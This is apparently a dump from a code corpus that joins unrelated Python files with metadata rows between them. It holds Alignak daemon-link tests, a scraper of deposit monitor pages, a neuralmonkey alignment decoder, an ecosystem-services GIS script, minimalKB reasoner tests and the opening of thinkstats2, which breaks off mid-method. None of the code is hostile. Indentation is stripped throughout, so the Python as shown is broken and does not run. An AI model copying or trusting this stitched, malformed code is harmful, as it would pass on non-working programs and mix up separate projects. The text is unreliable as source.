class template_DaemonLink_get_name():
def get_link(self):
cls = self.daemon_link
return cls({})
def test_get_name(self):
link = self.get_link()
print(("Link: %s / %s" % (type(link), link)))
link.fill_default()
print(("Name: %s / %s / %s" % (link.type, link.name, link.get_name())))
print(("Config: %s" % (link.give_satellite_cfg())))
print(("Config: %s" % (link.have_conf)))
assert False == link.have_conf
try:
self.assertEqual("Unnamed {0}".format(self.daemon_link.my_type), link.get_name())
except AttributeError:
self.assertTrue(False, "get_name should not raise AttributeError")
class Test_ArbiterLink_get_name(template_DaemonLink_get_name, AlignakTest):
"""Test satellite link arbiter"""
def setUp(self):
super(Test_ArbiterLink_get_name, self).setUp()
daemon_link = ArbiterLink
class Test_SchedulerLink_get_name(template_DaemonLink_get_name, AlignakTest):
"""Test satellite link scheduler"""
def setUp(self):
super(Test_SchedulerLink_get_name, self).setUp()
daemon_link = SchedulerLink
class Test_BrokerLink_get_name(template_DaemonLink_get_name, AlignakTest):
"""Test satellite link broker"""
def setUp(self):
super(Test_BrokerLink_get_name, self).setUp()
daemon_link = BrokerLink
class Test_ReactionnerLink_get_name(template_DaemonLink_get_name, AlignakTest):
"""Test satellite link reactionner"""
def setUp(self):
super(Test_ReactionnerLink_get_name, self).setUp()
daemon_link = ReactionnerLink
class Test_ReceiverLink_get_name(template_DaemonLink_get_name, AlignakTest):
"""Test satellite link receiver"""
def setUp(self):
super(Test_ReceiverLink_get_name, self).setUp()
daemon_link = ReceiverLink
class Test_PollerLink_get_name(template_DaemonLink_get_name, AlignakTest):
"""Test satellite link poller"""
def setUp(self):
super(Test_PollerLink_get_name, self).setUp()
daemon_link = PollerLink
| agpl-3.0 | -3,222,885,129,645,364,700 | 32.989474 | 93 | 0.703314 | false |
vietdh85/vh-utility | script/rcb/graspgold.py | 1 | 1037 | import sys
import os.path
from pyquery import PyQuery as pq
import time
import common
def getValues(item):
url = item[3]
print("getValues(): ", url)
format = "%b %d %Y %H:%M:%S"
d = pq(url=url)
list = d(".list td")
index = 0
while index < len(list):
try :
obj = {}
obj['date'] = common.removeNumberString(list[index].text_content())
obj['time'] = common.dateStringToTimestamp(obj['date'], format=format)
obj['time'] = common.formatTimestamp(obj['time'])
obj['user'] = list[index + 1].text_content()
obj['deposit'] = list[index + 2].text_content().split("/")[0].replace("$", "")
obj['site_id'] = item[0]
obj['monitor'] = item[2]
print("{0} - {1} - {2} - {3} - {4} - {5}".format(obj['site_id'], obj['monitor'], obj['date'], obj['time'], obj['user'], obj['deposit']))
if common.insertUserRcb(obj) == -1:
return
except Exception:
pass
index += 5
def run(item):
print "\n========== RUN graspgold.run() ============"
# try :
getValues(item)
# except Exception:
# pass
| gpl-3.0 | 1,925,032,494,287,725,800 | 22.568182 | 139 | 0.580521 | false |
juliakreutzer/bandit-neuralmonkey | neuralmonkey/decoders/word_alignment_decoder.py | 1 | 3918 | from typing import cast
import numpy as np
import tensorflow as tf
from neuralmonkey.dataset import Dataset
from neuralmonkey.encoders.recurrent import RecurrentEncoder
from neuralmonkey.decoders.decoder import Decoder
from neuralmonkey.logging import warn
from neuralmonkey.model.model_part import ModelPart, FeedDict, InitializerSpecs
from neuralmonkey.model.sequence import Sequence
from neuralmonkey.decorators import tensor
class WordAlignmentDecoder(ModelPart):
"""A decoder that computes soft alignment from an attentive encoder.
Loss is computed as cross-entropy against a reference alignment.
"""
def __init__(self,
encoder: RecurrentEncoder,
decoder: Decoder,
data_id: str,
name: str,
initializers: InitializerSpecs = None) -> None:
ModelPart.__init__(self, name, None, None, initializers)
self.encoder = encoder
self.decoder = decoder
self.data_id = data_id
if not isinstance(self.encoder.input_sequence, Sequence):
raise TypeError("Expected Sequence type in encoder.input_sequence")
self.enc_input = cast(Sequence, self.encoder.input_sequence)
# TODO this is here to call the lazy properties which create
# the list of attention distribbutions
# pylint: disable=pointless-statement
self.decoder.runtime_logits
self.decoder.train_logits
# pylint: enable=pointless-statement
_, self.train_loss = self._make_decoder(runtime_mode=False)
self.decoded, self.runtime_loss = self._make_decoder(runtime_mode=True)
tf.summary.scalar("alignment_train_xent", self.train_loss,
collections=["summary_train"])
@tensor
def ref_alignment(self) -> tf.Tensor:
# TODO dynamic shape?
return tf.placeholder(
dtype=tf.float32,
shape=[None, self.decoder.max_output_len,
self.enc_input.max_length],
name="ref_alignment")
@tensor
def alignment_target(self) -> tf.Tensor:
# shape will be [max_output_len, batch_size, max_input_len]
return tf.transpose(self.ref_alignment, perm=[1, 0, 2])
def _make_decoder(self, runtime_mode=False):
attn_obj = self.decoder.get_attention_object(self.encoder,
not runtime_mode)
if runtime_mode:
alignment_logits = tf.stack(
attn_obj.histories["{}_run".format(
self.decoder.name)],
name="alignment_logits")
# make batch_size the first dimension
alignment = tf.transpose(tf.nn.softmax(alignment_logits),
perm=[1, 0, 2])
loss = tf.constant(0)
else:
alignment_logits = tf.stack(
attn_obj.histories["{}_train".format(
self.decoder.name)],
name="alignment_logits")
alignment = None
xent = tf.nn.softmax_cross_entropy_with_logits(
labels=self.alignment_target, logits=alignment_logits)
loss = tf.reduce_sum(xent * self.decoder.train_padding)
return alignment, loss
@property
def cost(self) -> tf.Tensor:
return self.train_loss
def feed_dict(self, dataset: Dataset, train: bool = False) -> FeedDict:
fd = {}
alignment = dataset.maybe_get_series(self.data_id)
if alignment is None:
if train:
warn("Training alignment not present!")
alignment = np.zeros((len(dataset),
self.decoder.max_output_len,
self.enc_input.max_length),
np.float32)
fd[self.ref_alignment] = alignment
return fd
| bsd-3-clause | 5,833,592,751,520,678,000 | 34.944954 | 79 | 0.593415 | false |
JamesSample/ecosystem_services_impacts | Code/01_es_lu_cc.py | 1 | 21539 | #------------------------------------------------------------------------------
# Name: 01_es_lu_cc.py
# Purpose: Processing for the CREW project on ES, LUC and CC.
#
# Author: James Sample
#
# Created: 14/01/2015
# Copyright: (c) James Sample and JHI, 2015
# License: https://github.com/JamesSample/ecosystem_services_impacts/blob/master/LICENSE
#------------------------------------------------------------------------------
""" Processes the Future Flows (FF) climate data and estimate climate and land
use change effects on Ecosystem Services (ES). Reads workshop outputs and
performs the following steps:
1. For each ES, reads monthly rainfall and ET grids for the months
specified for both baseline and future periods. For the seasons of
interest, calculates the % change in rainfall and ET between
baseline and future.
2. Combines rainfall and runoff percentage changes into a qualitative
grid of change in runoff.
3. Estimates impacts grids for each ES for CC only, LUC only and CC &
LUC combined.
Inputs grids are supplied in HDF5 file format.
"""
import pandas as pd, h5py, numpy as np, matplotlib, matplotlib.pyplot as plt
import os, sys
from mpl_toolkits.axes_grid1 import ImageGrid
from osgeo import gdal, gdalconst, osr
def read_array_from_h5(h5, variable, model, year, month):
""" Read an array from a specified location in an H5 file.
Args:
h5: The open HDF5 file object
variable: The variable of interest ('rainfall' or 'pet')
model: The code for the climate model of interest (string)
year: Year (integer)
month: Month (integer)
Returns:
array
"""
dset_path = r'/ff_data/%s/%s/%s_%s' % (model, variable, variable, year)
data = h5.get(dset_path)[:,:,month-1].astype(float)
# Set NoData to NaN
data[data==-99] = np.nan
# Convert units
data = data/100
return data
def avg_rain_et(h5, st_yr, end_yr, months):
""" Calculate average rainfall and ET grids for the specified years and
months.
Args:
h5: The open HDF5 file object
st_yr: Start year for period of interest (integer)
end_yr: End year for period of interest (integer)
months: List of months of interest (integers)
Returns:
Tuple of arrays (average rainfall, average PET)
"""
# Empty arrays to store rainfall and ET totals
rn_tot = np.zeros((715, 485))
et_tot = np.zeros((715, 485))
# Total number of years to average over
years = end_yr + 1 - st_yr
# Loop over rainfall and ET
for year in range(st_yr, end_yr+1):
for month in months:
# Read rainfall and ET grids
rn = read_array_from_h5(h5, 'rainfall', model, year, month)
et = read_array_from_h5(h5, 'pet', model, year, month)
# Add to totals
rn_tot += rn
et_tot += et
# Average
rn_av = rn_tot/years
et_av = et_tot/years
return (rn_av, et_av)
def plot_avg_grids(base_rn_av, base_et_av, fut_rn_av, fut_et_av):
""" Plot the average rainfall and ET grids. Used for testing.
Args:
base_rn_av: Average rainfall grid for baseline period.
base_et_av: Average PET grid for baseline period.
fut_rn_av: Average rainfall grid for future period.
fut_et_av: Average PET grid for future period.
Returns:
None. Displays maps of each grid using same colour scale.
"""
# Get min and max values from grids
rnmin = min(np.nanmin(base_rn_av), np.nanmin(fut_rn_av))
rnmax = max(np.nanmax(base_rn_av), np.nanmax(fut_rn_av))
etmin = min(np.nanmin(base_et_av), np.nanmin(fut_et_av))
etmax = max(np.nanmax(base_et_av), np.nanmax(fut_et_av))
# Plot
fig = plt.figure()
grid = ImageGrid(fig, 111,
nrows_ncols = (1, 4),
axes_pad=0.5,
cbar_mode='each')
im0 = grid[0].imshow(base_rn_av, vmin=rnmin, vmax=rnmax,
interpolation='nearest')
grid.cbar_axes[0].colorbar(im0)
im1 = grid[1].imshow(fut_rn_av, vmin=rnmin, vmax=rnmax,
interpolation='nearest')
grid.cbar_axes[1].colorbar(im1)
im2 = grid[2].imshow(base_et_av, vmin=etmin, vmax=etmax,
interpolation='nearest')
grid.cbar_axes[2].colorbar(im2)
im3 = grid[3].imshow(fut_et_av, vmin=etmin, vmax=etmax,
interpolation='nearest')
grid.cbar_axes[3].colorbar(im3)
plt.show()
def plot_reclassified_grid(array, out_path, sup_title='Main title',
title='Sub-title'):
""" Plot and save the reclassified grid.
Args:
array: Grid of integers in range -2 to +2
out_path: Output file path (PNG or PDF)
sup_title: Main title for plot (string)
title: Sub-title for plot (string)
Returns:
None. Saves a plot to the specified path.
"""
# Make a color map of fixed colors
cmap = matplotlib.colors.ListedColormap(['Red', 'Orange', 'LimeGreen',
'DeepSkyBlue', 'Blue'])
bounds=[-2.5, -1.5, -0.5, 0.5, 1.5, 2.5]
norm = matplotlib.colors.BoundaryNorm(bounds, cmap.N)
# Create axes for plot (A4 size)
fig, axes = plt.subplots(nrows=1, ncols=1, figsize=(8.3,11.7))
# Plot the array, using the colours specified
img = axes.imshow(array, interpolation='nearest', origin='upper',
cmap=cmap, norm=norm)
# Add labels to plot
plt.title(title)
plt.suptitle(sup_title, fontsize=16, y=0.95)
plt.ylabel('Northing')
plt.xlabel('Easting')
plt.grid(True)
# Reformat the axis labels (mainly change the Y values into northings)
axes.set_yticks([35, 135, 235, 335, 435, 535, 635, 735])
axes.set_yticklabels([1200, 1100, 1000, 900, 800, 700, 600, 500])
axes.set_xticks([100, 200, 300, 400])
# Add axes for the color bar
cax = fig.add_axes([0.2, 0.785, 0.02, 0.10])
# Add the colour bar and set labels
cbar = fig.colorbar(img, cax=cax, cmap=cmap, norm=norm, boundaries=bounds,
ticks=[-2.2,-1.2,-0.2,0.8,1.8])
cbar.set_ticklabels(['Large decrease',
'Small decrease',
'Neutral',
'Small increase',
'Large increase'], update_ticks=True)
# Make the cbar ticks invisible
ticks = cbar.ax.get_yticklines()
for tick in ticks:
plt.setp(tick, alpha=0)
cbar_labels = plt.getp(cbar.ax.axes, 'yticklabels')
plt.setp(cbar_labels, fontsize=10)
# Save fig
plt.savefig(out_path, dpi=300)
## plt.show()
plt.clf()
plt.close()
def reclass_rn_et_grid(array):
""" Take an array of percentage changes and reclassify it according to:
% change | Class
x<=-15 | -2
-15<x<=-5 | -1
-5<x<=5 | 0
5<x<=15 | +1
15<x | +2
Args:
array: Array of percentage changes to be reclassified.
Returns:
Reclassified array
"""
# Create copy of array for reclass values
rc = array.copy()
rc[array<=-15] = -2
rc[(-15<array) & (array<=-5)] = -1
rc[(-5<array) & (array<=5)] = 0
rc[(5<array) & (array<=15)] = 1
rc[15<array] = 2
return rc
def reclass_ro(matrix_path, rn, et):
""" Generate reclassification matrix for runoff based on reclassified
change grids for rainfall and PET and the runoff reclassification
matrix from the workshop.
Args:
matrix_path: Path to CSV file representing runoff matrix.
rn: Reclassified rainfall grid from reclass_rn_et_grid
et: Reclassified PET grid from reclass_rn_et_grid
Returns:
Array (grid of integers representing change in runoff)
"""
# Read matrix
df = pd.read_csv(matrix_path, index_col=0)
# Grid of NaNs wih correct shape
ro = rn.copy()*np.nan
# Loop over inidces
for x, y in np.ndindex(ro.shape):
# Get values for change in rainfall and ET
et_ch = et[x, y]
rn_ch = rn[x, y]
# If both are not nan, reclassify
if (np.isfinite(et_ch) and np.isfinite(rn_ch)):
rc_val = df.ix[int(et_ch), str(int(rn_ch))]
ro[x, y] = rc_val
return ro
def reclass_es_ro(es_idx, ro):
""" Reclassify the runoff grid to estimate effects of runoff change on each
ES.
Args:
es_idx: The ID of the ES of interest in data frame ro_df
ro: The runoff change grid from reclass_ro
Returns:
Array (grid of integers representing change in ES)
"""
# Make a copy of the ro grid to update
es = ro.copy()
# Reclassify
for chng in [-2, -1, 0, 1, 2]:
es[ro==chng] = ro_df.ix[es_idx, 'RO_%d' % chng]
return es
def read_ascii(ascii_path,
xmin=0,
xmax=485000,
ymin=520000,
ymax=1235000,
exptd_rows=715,
exptd_cols=485,
exptd_px_wd=1000,
exptd_px_ht=-1000,
exptd_ndv=-9999):
""" Read an ASCII grid file, clip it to the specified bounding box and
return a numpy array.
Args:
xmin: Minimum Easting in OSGB1936 metres.
xmax: Maximum Easting in OSGB1936 metres.
ymin: Minimum Northing in OSGB1936 metres.
ymax: Maximum Northing in OSGB1936 metres.
exptd_rows: No. of rows expected in file.
exptd_cols: No. of columns expected in file.
exptd_px_wd: Cell width.
exptd_px_ht: Cell height.
exptd_ndv: No data value.
Returns:
Array (floats).
"""
# Register drivers
gdal.AllRegister()
# Process the file with GDAL
ds = gdal.Open(ascii_path, gdalconst.GA_ReadOnly)
if ds is None:
print 'Could not open ' + ascii_path
sys.exit(1)
# In order to select the first cell correctly, choose a point just within
# the top left corner of the specified bounding box.
x = xmin + 10
y = ymax - 10
# Dataset properties
geotransform = ds.GetGeoTransform()
originX = geotransform[0]
originY = geotransform[3]
pixelWidth = geotransform[1]
pixelHeight = geotransform[5]
# Calculate number of rows and cols to return
rows = abs(int((ymax-ymin)/pixelHeight))
cols = int((xmax-xmin)/pixelWidth)
# Select starting pixel
xOffset = int((x - originX) / pixelWidth)
yOffset = int((y - originY) / pixelHeight)
band = ds.GetRasterBand(1)
no_data_val = band.GetNoDataValue()
# Simple checking
assert rows == exptd_rows
assert cols == exptd_cols
assert pixelWidth == exptd_px_wd
assert pixelHeight == exptd_px_ht
assert no_data_val == exptd_ndv
# Read the data to an array
data = band.ReadAsArray(xOffset, yOffset, cols, rows)
# Close the dataset
ds = None
return data.astype(float)
def process_land_use_change(lu_mat_path, base, fut, esid, codes_df):
""" Estimate land use change (LUC) only effects for the specified ES.
Args:
lu_mat_path: Excel file containing land use matrices from the workshop.
base: Baseline land luse grid.
fut: Future land luse grid.
esid: ES ID from land use matrices Excel file
codes_df: Land use code look-up table (as data frame)
Returns:
Array (grid of integers representing change in ES)
"""
# Read matrix for this ES
lu_mat = pd.read_excel(lu_mat_path, sheetname='Land Use')
# Get row for start of matrix
st_row = (lu_mat['ES_ID']==esid).nonzero()[0][0] + 2
# Read matrix of interest
lu_mat = pd.read_excel(lu_mat_path, sheetname='Land Use', skiprows=st_row,
skip_footer=(120-6-st_row), parse_cols='C:I',
index_col=0)
# Perform reclassification
# Grid of NaNs wih correct shape
rc = base.copy()*np.nan
# Loop over inidces
for x, y in np.ndindex(base.shape):
# Get values for baseline and future LU
base_lu = base[x, y]
fut_lu = fut[x, y]
# If both are not nan, reclassify
if (np.isfinite(base_lu) and np.isfinite(fut_lu)):
# Get the base and fut LU as a string
base_str = codes_df.ix[int(base_lu)]['LU_Class']
fut_str = codes_df.ix[int(fut_lu)]['LU_Class']
rc_val = lu_mat.ix[base_str, fut_str]
rc[x, y] = rc_val
return rc
def process_land_use_and_climate_change(lucc_mat_path, lugrid, ccgrid, esid):
""" Estimate combined land use and climate change effects for the specified
ES.
Args:
lucc_mat_path: Excel file containing matrices from the workshop.
lugrid: The grid of land use change effects.
ccgrid: The grid of climate change effects.
esid: ES ID from workshop matrices Excel file.
Returns:
Array (grid of integers representing change in ES)
"""
# Read matrix for this ES
lucc_mat = pd.read_excel(lucc_mat_path, sheetname='CC_LU')
# Get row for start of matrix
st_row = (lucc_mat['ES_ID']==esid).nonzero()[0][0] + 2
# Read matrix of interest
lucc_mat = pd.read_excel(lucc_mat_path, sheetname='CC_LU', skiprows=st_row,
skip_footer=(108-5-st_row), parse_cols='C:I',
index_col=0)
# Perform reclassification
# Grid of NaNs wih correct shape
rc = lugrid.copy()*np.nan
# Loop over inidces
for x, y in np.ndindex(lugrid.shape):
# Get values for baseline and future LU
lu = lugrid[x, y]
cc = ccgrid[x, y]
# If both are not nan, reclassify
if (np.isfinite(lu) and np.isfinite(cc)):
# Get the base and fut LU as a string
rc_val = lucc_mat.ix[int(lu), int(cc)]
rc[x, y] = rc_val
return rc
def array_to_gtiff(out_path, data_array, ndv=-9999, xmin=0, ymax=1235000,
cell_size=1000):
""" Convert numpy array to 16-bit integer GeoTiff.
Args:
out_path: The .tif file to be created.
data_array: The (integer) data array to save.
ndv: No data value.
xmin: Minimum x (Easting) co-ordinate, in OSGB1936 metres
ymax: Maximim y (Northing) co-ordinate, in OSGB1936 metres
cell_size: Cell size (metres)
Returns:
None. Array is saved to specified path.
"""
# Copy data_array so that it is not modified
data = data_array.copy()
# Convert NaNs to NDV
data[np.isnan(data)] = ndv
# Get array shape
cols = data.shape[1]
rows = data.shape[0]
# Get driver
driver = gdal.GetDriverByName('GTiff') # NB can't directly create ArcInfo ASCII grids in this way
# Create a new raster data source
out_ds = driver.Create(out_path, cols, rows, 1, gdal.GDT_Int16)
# Get spatial ref details
srs = osr.SpatialReference()
srs.ImportFromEPSG(27700) # From EPSG for OSGB36 grid
# Write metadata
out_ds.SetGeoTransform((xmin, cell_size, 0.0, ymax, 0.0, -1*cell_size)) #(xmin, cellsize, 0, ymax, 0, -cellsize)
out_ds.SetProjection(srs.ExportToWkt())
out_band = out_ds.GetRasterBand(1)
out_band.SetNoDataValue(ndv)
out_band.WriteArray(data)
# Tidy up
del out_ds, out_band
# #############################################################################
# User input
# Climate data
ff_h5_path = r'D:\WBM_Development_2014\WBM_2014_Monthly_Input_File.h5'
# Runoff matrices
ro_path = r'D:\Eco_Services_Impacts\Matrices_Development\03_Group_1_Matrices\Runoff_Impacts_Grp1.csv'
ro_matrix_15 = r'D:\Eco_Services_Impacts\Matrices_Development\02_Common_Matrices\Runoff_Matrix_15pct.csv'
# Land use data
base_path = r'D:\Eco_Services_Impacts\Land_Use\baseline_lu_lcm07.txt'
fut_path = r'D:\Eco_Services_Impacts\Land_Use\future_lu_2050.txt'
# Land use matrices
lu_classes_path = r'D:\Eco_Services_Impacts\Land_Use\Land_Use_Classes.csv'
lu_matrices_path = r'D:\Eco_Services_Impacts\Matrices_Development\03_Group_1_Matrices\Land_Use_Matrices_Grp1.xlsx'
# Land use and climate combined matrices
lucc_matrices_path = r'D:\Eco_Services_Impacts\Matrices_Development\03_Group_1_Matrices\Climate_And_Land_Use_Matrices_Grp1.xlsx'
# Output folders
out_pdf_fold = r'D:\Eco_Services_Impacts\Model_Output\02_Group_1_Output\PDF'
out_array_fold = r'D:\Eco_Services_Impacts\Model_Output\02_Group_1_Output\GeoTiffs'
# Time periods to compare
base_st_yr, base_end_yr = 1961, 1990
fut_st_yr, fut_end_yr = 2041, 2070
# Future Flows models of interest
models = ['afixa', 'afixc', 'afixl', 'afixm', 'afixo', 'afixh',
'afixi', 'afixj', 'afixk', 'afgcx', 'afixq']
# #############################################################################
# Read LU grids
base = read_ascii(base_path)
base[base==-9999] = np.nan
fut = read_ascii(fut_path)
fut[fut==-9999] = np.nan
# Read LU class codes
codes_df = pd.read_csv(lu_classes_path, index_col=0)
# Read the runoff matrices
ro_df = pd.read_csv(ro_path, index_col=0)
# Open H5 file
h5 = h5py.File(ff_h5_path, 'r')
# Iterate over each ES
for idx in ro_df.index:
print '\nProcessing land use change impacts for %s.' % ro_df.ix[idx, 'ES']
# 1. Process land use change only
luc = process_land_use_change(lu_matrices_path, base, fut, idx, codes_df)
# Prepare to save
out_name = 'ES%02d_LUC' % idx
# Save array
out_array = os.path.join(out_array_fold, '%s.tif' % out_name)
array_to_gtiff(out_array, luc)
# Save PDF
out_pdf = os.path.join(out_pdf_fold, '%s.pdf' % out_name)
plot_reclassified_grid(luc, out_pdf,
sup_title='Change in %s' % ro_df.ix[idx, 'ES'],
title='(land use change only)' )
# 2. Process climate change only
# Get the relevant months for this ES
months = [int(i) for i in ro_df.ix[idx, 'Key_Months'].split(',')]
# Loop over climate models of interest
for model in models:
print ('Processing climate change impacts for '
'%s (model %s).' % (ro_df.ix[idx, 'ES'], model))
# 2.1. Baseline
base_rn_av, base_et_av = avg_rain_et(h5, base_st_yr, base_end_yr,
months)
# 2.2. Future
fut_rn_av, fut_et_av = avg_rain_et(h5, fut_st_yr, fut_end_yr,
months)
# Plot
# plot_avg_grids(base_rn_av, base_et_av, fut_rn_av, fut_et_av)
# Calculate % change
rn_pct = 100*(fut_rn_av - base_rn_av)/base_rn_av
et_pct = 100*(fut_et_av - base_et_av)/base_et_av
# Reclassify
rn_rc = reclass_rn_et_grid(rn_pct)
et_rc = reclass_rn_et_grid(et_pct)
# plot_reclassified_grid(rn_rc)
# plot_reclassified_grid(et_rc)
# Generate runoff grid
ro = reclass_ro(ro_matrix_15, rn_rc, et_rc)
# # Plot runoff grid
# plot_reclassified_grid(ro,
# sup_title='Change in runoff',
# title='(Model %s; %s)' % (model, months))
# Reclass ro grid to estimate ES impact
es = reclass_es_ro(idx, ro)
# Prepare to save
out_name = 'ES%02d_%s' % (idx, model)
# Save array
out_array = os.path.join(out_array_fold, '%s.tif' % out_name)
array_to_gtiff(out_array, es)
# Save PDF
out_pdf = os.path.join(out_pdf_fold, '%s.pdf' % out_name)
plot_reclassified_grid(es, out_pdf,
sup_title='Change in %s' % ro_df.ix[idx, 'ES'],
title='(climate model %s only)' % model)
# 3. Process combined land use and climate effects
print ('Processing climate and land use change impacts for '
'%s (model %s).' % (ro_df.ix[idx, 'ES'], model))
# Reclassify to get CC and LUC effects
cc_lu = process_land_use_and_climate_change(lucc_matrices_path, luc,
es, idx)
# Prepare to save
out_name = 'ES%02d_LUC_%s' % (idx, model)
# Save array
out_array = os.path.join(out_array_fold, '%s.tif' % out_name)
array_to_gtiff(out_array, cc_lu)
# Save PDF
out_pdf = os.path.join(out_pdf_fold, '%s.pdf' % out_name)
plot_reclassified_grid(cc_lu, out_pdf,
sup_title='Change in %s' % ro_df.ix[idx, 'ES'],
title='(climate and land use change together)')
# Close H5 file
h5.close()
print '\nFinished.' | mit | 7,467,887,343,285,515,000 | 32.92126 | 128 | 0.566229 | false |
severin-lemaignan/minimalkb | testing/test_reasoner.py | 1 | 3841 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import logging
import unittest
import time
try:
import kb
except ImportError:
import sys
print("You must first install pykb")
sys.exit(1)
from minimalkb import __version__
from queue import Empty
REASONING_DELAY = 0.2
class TestRDFSReasoner(unittest.TestCase):
def setUp(self):
self.kb = kb.KB()
self.kb.clear()
def tearDown(self):
self.kb.close()
def test_complex_events_rdfs(self):
evtid = self.kb.subscribe(["?a desires ?act", "?act rdf:type Action"], var = "a")
# should not trigger an event
self.kb += ["alfred desires ragnagna"]
time.sleep(0.1)
with self.assertRaises(Empty):
self.kb.events.get_nowait()
# should not trigger an event
self.kb += ["ragnagna rdf:type Zorro"]
time.sleep(0.1)
with self.assertRaises(Empty):
self.kb.events.get_nowait()
# should trigger an event
self.kb += ["Zorro rdfs:subClassOf Action"]
time.sleep(REASONING_DELAY)
# required to ensure the event is triggered after classification!
self.kb += ["nop nop nop"]
time.sleep(0.1)
id, value = self.kb.events.get_nowait()
self.assertEqual(id, evtid)
self.assertCountEqual(value, [u"alfred"])
def test_taxonomy_walking_inheritance(self):
self.kb += ["john rdf:type Human"]
self.assertCountEqual(self.kb.classesof("john"), [u'Human'])
self.kb += ["Human rdfs:subClassOf Animal"]
time.sleep(REASONING_DELAY)
self.assertCountEqual(self.kb.classesof("john"), [u'Human', u'Animal'])
self.assertCountEqual(self.kb.classesof("john", True), [u'Human'])
self.kb -= ["john rdf:type Human"]
time.sleep(REASONING_DELAY)
self.assertFalse(self.kb.classesof("john"))
def test_second_level_inheritance(self):
self.kb += 'myself rdf:type Robot'
self.kb += ['Robot rdfs:subClassOf Agent', 'Agent rdfs:subClassOf PhysicalEntity']
time.sleep(REASONING_DELAY)
self.assertTrue('Robot rdfs:subClassOf PhysicalEntity' in self.kb)
self.assertTrue('myself rdf:type PhysicalEntity' in self.kb)
def test_equivalent_classes_transitivity(self):
self.kb += 'myself rdf:type Robot'
self.kb += ['Robot owl:equivalentClass Machine', 'Machine owl:equivalentClass Automaton']
self.kb += 'PR2 rdfs:subClassOf Automaton'
time.sleep(REASONING_DELAY)
self.assertTrue('Robot owl:equivalentClass Automaton' in self.kb)
self.assertCountEqual(self.kb.classesof("myself"), [u'Robot', u'Machine', u'Automaton'])
self.assertTrue('PR2 rdfs:subClassOf Robot' in self.kb)
def test_existence_with_inference(self):
self.kb += ["alfred rdf:type Human", "Human rdfs:subClassOf Animal"]
time.sleep(REASONING_DELAY)
self.assertTrue('alfred rdf:type Animal' in self.kb)
self.kb += ["Animal rdfs:subClassOf Thing"]
time.sleep(REASONING_DELAY)
self.assertTrue('alfred rdf:type Thing' in self.kb)
def version():
print("minimalKB RDFS reasoner tests %s" % __version__)
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description='Test suite for minimalKB.')
parser.add_argument('-v', '--version', action='version',
version=version(), help='returns minimalKB version')
parser.add_argument('-f', '--failfast', action='store_true',
help='stops at first failed test')
args = parser.parse_args()
kblogger = logging.getLogger("kb")
console = logging.StreamHandler()
kblogger.setLevel(logging.DEBUG)
kblogger.addHandler(console)
unittest.main(failfast=args.failfast)
| bsd-3-clause | 121,374,193,478,665,800 | 29.728 | 97 | 0.633949 | false |
silky/ProbablyOverthinkingIt | thinkstats2.py | 1 | 69096 | """This file contains code for use with "Think Stats" and
"Think Bayes", both by Allen B. Downey, available from greenteapress.com
Copyright 2014 Allen B. Downey
License: GNU GPLv3 http://www.gnu.org/licenses/gpl.html
"""
from __future__ import print_function, division
"""This file contains class definitions for:
Hist: represents a histogram (map from values to integer frequencies).
Pmf: represents a probability mass function (map from values to probs).
_DictWrapper: private parent class for Hist and Pmf.
Cdf: represents a discrete cumulative distribution function
Pdf: represents a continuous probability density function
"""
import bisect
import copy
import logging
import math
import random
import re
from collections import Counter
from operator import itemgetter
import thinkplot
import numpy as np
import pandas
import scipy
from scipy import stats
from scipy import special
from scipy import ndimage
from io import open
ROOT2 = math.sqrt(2)
def RandomSeed(x):
"""Initialize the random and np.random generators.
x: int seed
"""
random.seed(x)
np.random.seed(x)
def Odds(p):
"""Computes odds for a given probability.
Example: p=0.75 means 75 for and 25 against, or 3:1 odds in favor.
Note: when p=1, the formula for odds divides by zero, which is
normally undefined. But I think it is reasonable to define Odds(1)
to be infinity, so that's what this function does.
p: float 0-1
Returns: float odds
"""
if p == 1:
return float('inf')
return p / (1 - p)
def Probability(o):
"""Computes the probability corresponding to given odds.
Example: o=2 means 2:1 odds in favor, or 2/3 probability
o: float odds, strictly positive
Returns: float probability
"""
return o / (o + 1)
def Probability2(yes, no):
"""Computes the probability corresponding to given odds.
Example: yes=2, no=1 means 2:1 odds in favor, or 2/3 probability.
yes, no: int or float odds in favor
"""
return yes / (yes + no)
class Interpolator(object):
"""Represents a mapping between sorted sequences; performs linear interp.
Attributes:
xs: sorted list
ys: sorted list
"""
def __init__(self, xs, ys):
self.xs = xs
self.ys = ys
def Lookup(self, x):
"""Looks up x and returns the corresponding value of y."""
return self._Bisect(x, self.xs, self.ys)
def Reverse(self, y):
"""Looks up y and returns the corresponding value of x."""
return self._Bisect(y, self.ys, self.xs)
def _Bisect(self, x, xs, ys):
"""Helper function."""
if x <= xs[0]:
return ys[0]
if x >= xs[-1]:
return ys[-1]
i = bisect.bisect(xs, x)
frac = 1.0 * (x - xs[i - 1]) / (xs[i] - xs[i - 1])
y = ys[i - 1] + frac * 1.0 * (ys[i] - ys[i - 1])
return y
class _DictWrapper(object):
"""An object that contains a dictionary."""
def __init__(self, obj=None, label=None):
"""Initializes the distribution.
obj: Hist, Pmf, Cdf, Pdf, dict, pandas Series, list of pairs
label: string label
"""
self.label = label if label is not None else '_nolegend_'
self.d = {}
# flag whether the distribution is under a log transform
self.log = False
if obj is None:
return
if isinstance(obj, (_DictWrapper, Cdf, Pdf)):
self.label = label if label is not None else obj.label
if isinstance(obj, dict):
self.d.update(obj.items())
elif isinstance(obj, (_DictWrapper, Cdf, Pdf)):
self.d.update(obj.Items())
elif isinstance(obj, pandas.Series):
self.d.update(obj.value_counts().iteritems())
else:
# finally, treat it like a list
self.d.update(Counter(obj))
if len(self) > 0 and isinstance(self, Pmf):
self.Normalize()
def __hash__(self):
return id(self)
def __str__(self):
cls = self.__class__.__name__
return '%s(%s)' % (cls, str(self.d))
__repr__ = __str__
def __eq__(self, other):
return self.d == other.d
def __len__(self):
return len(self.d)
def __iter__(self):
return iter(self.d)
def iterkeys(self):
"""Returns an iterator over keys."""
return iter(self.d)
def __contains__(self, value):
return value in self.d
def __getitem__(self, value):
return self.d.get(value, 0)
def __setitem__(self, value, prob):
self.d[value] = prob
def __delitem__(self, value):
del self.d[value]
def Copy(self, label=None):
"""Returns a copy.
Make a shallow copy of d. If you want a deep copy of d,
use copy.deepcopy on the whole object.
label: string label for the new Hist
returns: new _DictWrapper with the same type
"""
new = copy.copy(self)
new.d = copy.copy(self.d)
new.label = label if label is not None else self.label
return new
def Scale(self, factor):
"""Multiplies the values by a factor.
factor: what to multiply by
Returns: new object
"""
new = self.Copy()
new.d.clear()
for val, prob in self.Items():
